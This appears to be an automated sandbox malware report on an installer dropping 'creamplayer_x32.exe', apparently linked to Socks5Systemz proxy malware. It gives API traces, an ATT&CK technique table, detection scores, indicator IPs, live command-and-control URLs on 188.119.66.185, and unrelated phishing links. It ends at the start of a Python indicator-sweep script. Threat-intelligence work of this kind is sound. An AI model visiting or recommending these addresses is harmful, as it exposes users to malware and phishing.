Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,5_2_6096281E
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,5_2_6096583A
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,5_2_6095F9AD
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6094A92B
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6090EAE5 sqlite3_transfer_bindings,5_2_6090EAE5
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,5_2_6095FB98
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,5_2_6095ECA6
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,5_2_6095FCCE
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,5_2_6095FDAE
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,5_2_60966DF1
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,5_2_60969D75
Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | Code function: 5_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,5_2_6095FFB2
Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology | IP Addresses
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising | Compromise Infrastructure
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application | Supply Chain Compromise
Execution: 2 Native API | 2 Command and Scripting Interpreter | 2 Service Execution | Cron | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter | PowerShell
Persistence: 1 DLL Side-Loading | 5 Windows Service | 1 Bootkit | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron
Privilege Escalation: 1 Exploitation for Privilege Escalation | 1 DLL Side-Loading | 1 Access Token Manipulation | 5 Windows Service | 12 Process Injection | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron
Defense Evasion: 1 Deobfuscate/Decode Files or Information | 3 Obfuscated Files or Information | 21 Software Packing | 1 DLL Side-Loading | 1 Masquerading | 121 Virtualization/Sandbox Evasion | 1 Access Token Manipulation | 12 Process Injection | 1 Bootkit | Dynamic API Resolution
Credential Access: 1 Input Capture | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow | Network Sniffing
Discovery: 1 System Time Discovery | 1 Account Discovery | 2 File and Directory Discovery | 35 System Information Discovery | 141 Security Software Discovery | 1 Process Discovery | 121 Virtualization/Sandbox Evasion | 11 Application Window Discovery | 3 System Owner/User Discovery | 1 System Network Configuration Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections | Shared Webroot
Collection: 1 Archive Collected Data | 1 Input Capture | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged | Local Data Staging
Command and Control: 2 Ingress Tool Transfer | 21 Encrypted Channel | 1 Non-Standard Port | 1 Non-Application Layer Protocol | 12 Application Layer Protocol | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols | File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement | External Defacement
Source | Detection | Scanner | Label
bzX2pV3Ybw.exe | 21% | ReversingLabs | Win32.Trojan.Munp

Source | Detection | Scanner | Label
C:\ProgramData\SmartImageDrive\SmartImageDrive.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe | 100% | Joe Sandbox ML
C:\ProgramData\SmartImageDrive\sqlite3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\LTDIS13n.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\gdiplus.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\is-2031L.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\is-5889C.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\is-7JNKK.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\is-AG5KU.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\is-FFG28.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\is-S3M63.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\is-U5LDH.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\ltkrn13n.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\msvcp71.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\msvcr71.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\CreamPlayer 1.12\sqlite3.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-DCP4R.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://188.119.66.185/V | 0% | Avira URL Cloud | safe
https://188.119.66.185/allowedCert_OS_1 | 0% | Avira URL Cloud | safe
https://188.119.66.185/ECDB288DE53FB0A3EE059080EF4409BC0D96FBCi | 0% | Avira URL Cloud | safe
https://188.119.66.185/Q | 0% | Avira URL Cloud | safe
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325 | 100% | Avira URL Cloud | malware
https://188.119.66.185/- | 0% | Avira URL Cloud | safe
https://188.119.66.185/ography | 0% | Avira URL Cloud | safe
https://188.119.66.185/g | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 | 100% | Avira URL Cloud | malware
https://188.119.66.185/u | 0% | Avira URL Cloud | safe
https://188.119.66.185/4 | 0% | Avira URL Cloud | safe
https://188.119.66.185/: | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4 | 100% | Avira URL Cloud | malware
https://188.119.66.185/rosoft | 0% | Avira URL Cloud | safe
https://188.119.66.185/mCertificates | 0% | Avira URL Cloud | safe
https://188.119.66.185/3 | 0% | Avira URL Cloud | safe
https://188.119.66.185/n | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda322c18d43188 | 100% | Avira URL Cloud | malware
https://188.119.66.185/C | 0% | Avira URL Cloud | safe
https://188.119.66.185/J | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda322c18d43188 | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | bzX2pV3Ybw.tmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, bzX2pV3Ybw.tmp.0.dr, is-9AR6U.tmp.2.dr | false | | high
https://188.119.66.185/Q | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ography | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | bzX2pV3Ybw.exe | false | | high
https://188.119.66.185/ | creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/V | creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline | bzX2pV3Ybw.exe | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325 | creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A42000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://188.119.66.185/ECDB288DE53FB0A3EE059080EF4409BC0D96FBCi | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/- | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/allowedCert_OS_1 | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/g | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/u | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/4 | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/3 | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4 | creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.remobjects.com/psU | bzX2pV3Ybw.exe, 00000000.00000003.1353293615.0000000002278000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000003.1353116104.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, bzX2pV3Ybw.tmp.0.dr, is-9AR6U.tmp.2.dr | false | | high
https://188.119.66.185/priseCertificates | creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/n | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/mCertificates | creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/: | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/rosoft | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://188.119.66.185/en-GB | creamplayer_x32.exe, 00000005.00000002.2614997353.0000000000A32000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://188.119.66.185/C | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.remobjects.com/ps | bzX2pV3Ybw.exe, 00000000.00000003.1353293615.0000000002278000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000003.1353116104.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, bzX2pV3Ybw.tmp.0.dr, is-9AR6U.tmp.2.dr | false | | high
https://www.easycutstudio.com/support.html | bzX2pV3Ybw.exe, 00000000.00000003.1352721583.00000000025A0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000003.1352806549.0000000002271000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.exe, 00000000.00000002.2614892365.0000000002271000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000003.1355047520.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000003.1355124435.0000000002128000.00000004.00001000.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000002.2614915917.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, bzX2pV3Ybw.tmp, 00000002.00000002.2615261275.0000000002128000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://188.119.66.185/J | creamplayer_x32.exe, 00000005.00000002.2617153397.00000000034E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
31.214.157.206 | unknown | Germany | 58329 | RACKPLACEDE | false
188.119.66.185 | unknown | Russian Federation | 209499 | FLYNETRU | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1575123
                                      Start date and time:2024-12-14 14:06:38 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 16s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:12
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:bzX2pV3Ybw.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:cd6081e11eb60abfa77c3b587726d83f.exe
                                      Detection:MAL
                                      Classification:mal96.troj.evad.winEXE@10/30@0/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 92%
                                      • Number of executed functions: 193
                                      • Number of non-executed functions: 267
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:08:08 | API Interceptor | 501760x Sleep call for process: creamplayer_x32.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
31.214.157.206 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
31.214.157.206 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
31.214.157.206 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz
31.214.157.206 | 7i6bUvYZ4L.exe | malicious | Socks5Systemz
31.214.157.206 | file.exe | malicious | Socks5Systemz
31.214.157.206 | imMQqf6YWk.exe | malicious | Socks5Systemz
31.214.157.206 | imMQqf6YWk.exe | malicious | Socks5Systemz
31.214.157.206 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
31.214.157.206 | file.exe | malicious | Socks5Systemz
31.214.157.206 | file.exe | malicious | Socks5Systemz
188.119.66.185 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
188.119.66.185 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
188.119.66.185 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz
188.119.66.185 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz
188.119.66.185 | 7i6bUvYZ4L.exe | malicious | Socks5Systemz
188.119.66.185 | file.exe | malicious | Socks5Systemz
188.119.66.185 | imMQqf6YWk.exe | malicious | Socks5Systemz
188.119.66.185 | imMQqf6YWk.exe | malicious | Socks5Systemz
188.119.66.185 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
188.119.66.185 | file.exe | malicious | Socks5Systemz
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0035.t-0009.t-msedge.net | WUMIwpmxzw.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | PO_0099822111ORDER.js | malicious | Remcos | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Dqw8QFydEX.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://u13974777.ct.sendgrid.net/ls/click?upn=u001.1GFl1p-2BBYL-2Bhgs5F-2B0NOkrtNxvRU5lHyHn9X7Gay0rMweTw4Bty7YorCE1pBfo679HN2Nod-2BfRWA-2FvzNVU6n0ycgVO9YFLntVOrRszMr10A-3DE-mj_xaXJc0NsC5WAXuVv6HNgzGH9nxkzD8xRdi-2BQVNVTAgV30zfSKc1z4I-2Bc6Qx1hEzdtXusfFTLvSScqQmgK1DgmCe6NsmhCnbLpmZI7EPM56c0IpOXy2jX8FUofqX-2FLwkrDNu-2BJ8VdkhW-2BcibVgB56YvBarWAJ68QdVLDk-2BreYFAbG2RxK5FI2ZOf8OuVaYqzfkm-2FGiI9tY4Y1XN-2FN7Uh8Vtzi-2FP-2B8s9qjOHBuznAYsq-2B4GCewCcJExgcNnMrLH-2B3Pv6vH6wzFQkN2aMTddwwaWvcIkZYQDF7aLn1FYUQMocCkCTJEmkArX-2Bdrge72rYVSFN-2FsI6AAcwN5SA74y-2B4g6Q-3D-3D | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://pvlcorp-my.sharepoint.com/personal/ksears_provisionliving_com/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fksears%5Fprovisionliving%5Fcom%2FDocuments%2FBetter%20Call%20Armstrong&ga=1 | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Codale Electric Supply Health Insurance Benefits Open Enrollment Plan.html.shtml | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://us-west-2.protection.sophos.com/?d=microsoft.com&u=aHR0cHM6Ly9jdXN0b21lcnZvaWNlLm1pY3Jvc29mdC5jb20vUGFnZXMvUmVzcG9uc2VQYWdlLmFzcHg_aWQ9R1V1LXNGcV9vVWVfanViX1RzNWNzTjJ3cmI2cGNXbEJ2Vm9kQTg3OVBVbFVNRGMyUXpNd00wdENVVFJWT1ZGUFRWYzNPRWM1V0ZsRE1DNHU=&i=NThlN2NjYzYyOTljZjkxNGY4YmM0YmNh&t=YzVvY0ZoOHFRSGdCNnRncDc0ajJVNDZ2OTFMQXU1d0o3eU5tbk9LTnRwdz0=&h=fb80ac6ee6b9415ab2e67948974a6ac6&s=AVNPUEhUT0NFTkNSWVBUSVYEA8vQ82X9oDKen41DcCmWhkUnMNiRIUMWwszf4nzAf5AOW4BqwHD-tdThtGIGLos | malicious | HTMLPhisher, ReCaptcha Phish | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | zLMbHSW9Di.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | lNBFG9MHWz.dll | malicious | Unknown | 13.107.246.63

The context IP 13.107.246.63 is on this analysis's excluded (whitelisted) IP list, so this domain association is shared Windows background traffic and carries no attribution weight for the sample; the matches that matter are those on 31.214.157.206 and 188.119.66.185.
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RACKPLACEDE | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | 7i6bUvYZ4L.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | file.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | imMQqf6YWk.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | imMQqf6YWk.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 31.214.157.206
RACKPLACEDE | file.exe | malicious | Socks5Systemz | 31.214.157.206
RACKPLACEDE | file.exe | malicious | Socks5Systemz | 31.214.157.206
FLYNETRU | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | 7i6bUvYZ4L.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | file.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | imMQqf6YWk.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | imMQqf6YWk.exe | malicious | Socks5Systemz | 188.119.66.185
FLYNETRU | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 188.119.66.185
FLYNETRU | file.exe | malicious | Socks5Systemz | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name | Context
51c64c77e60f3980eea90869b68c58a8 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | 2mtt3zE6Vh.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | 7i6bUvYZ4L.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | imMQqf6YWk.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | imMQqf6YWk.exe | malicious | Socks5Systemz | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | 17Xmvtq2Tq.exe | malicious | Vidar | 188.119.66.185
51c64c77e60f3980eea90869b68c58a8 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 188.119.66.185
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\SmartImageDrive\sqlite3.dll | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
C:\ProgramData\SmartImageDrive\sqlite3.dll | Ni2ghr9eUJ.exe | malicious | Socks5Systemz
C:\ProgramData\SmartImageDrive\sqlite3.dll | 2mtt3zE6Vh.exe | malicious | Socks5Systemz
C:\ProgramData\SmartImageDrive\sqlite3.dll | 2mtt3zE6Vh.exe | malicious | Socks5Systemz
C:\ProgramData\SmartImageDrive\sqlite3.dll | 7i6bUvYZ4L.exe | malicious | Socks5Systemz
C:\ProgramData\SmartImageDrive\sqlite3.dll | file.exe | malicious | Socks5Systemz
C:\ProgramData\SmartImageDrive\sqlite3.dll | imMQqf6YWk.exe | malicious | Socks5Systemz
C:\ProgramData\SmartImageDrive\sqlite3.dll | imMQqf6YWk.exe | malicious | Socks5Systemz
C:\ProgramData\SmartImageDrive\sqlite3.dll | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
C:\ProgramData\SmartImageDrive\sqlite3.dll | file.exe | malicious | Socks5Systemz
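The IP table and the association tables above yield a short, actionable indicator set for this sample: the two contacted hosts (31.214.157.206 and 188.119.66.185) and the dropped-file path C:\ProgramData\SmartImageDrive\sqlite3.dll that recurs across the related Socks5Systemz analyses. As an added example that is not part of the Joe Sandbox report, the following Python sweeps log lines for those indicators. The log lines are constructed here (Zeek-style connection records and an EDR-style file event with assumed field names), and the two SHA-256 values are the digests of the first two dropped files listed in the file details below.

```python
"""Sweep log lines for the network and file indicators this report lists.

Added example, not Joe Sandbox code. SAMPLE_LOGS is constructed for the
demonstration (field names are assumptions); the indicator values come from
the report's IP table, dropped-file association table and file details.
"""
import re
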